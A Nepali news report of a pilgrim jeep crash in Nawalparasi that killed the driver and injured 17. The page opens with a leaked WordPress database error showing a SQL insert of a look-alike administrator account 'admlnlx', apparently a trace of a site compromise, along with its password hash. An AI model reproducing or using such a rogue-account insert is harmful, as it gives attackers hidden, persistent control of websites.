WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhUTkTFf0.Mc6asAuIg0I57wjpBHtH1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-12 01:02:56', '', 'admlnlx', 'admlnlx')
नवलपरासी, माघ १४ –
तीर्थालु बोकेको जिप आज नवलपरासीमा दुर्घटना हँुदा एक जनाको मृत्यु भएको छ भने अन्य १७ जना घाइते भएका छन् ।
कपिलस्तुबाट नवलपरासीस्थित त्रिवेणी धामका लागि तीर्थालु बोकेर हिँडेकोे लु १ ज १०८ नम्बरको जिप नवलपरासीको रामग्राम –६स्थित रामखण्ड पुल नजिकै दुर्घटना हुँदा जिप चालक कपिलबस्तुका अन्दाजी २१ वर्षीय राकेश कुमालको मृत्यु भएको जिल्ला प्रहरी कार्यालय नवलपरासीले जनाएको छ ।
दुर्घटनामा परी घाइते भएकामध्ये चार जनाको अवस्था गम्भीर रहेको छ । घाइतेहरुको भैरहवा मेडिकल कलेजमा उपचार भइरहेका छन् ।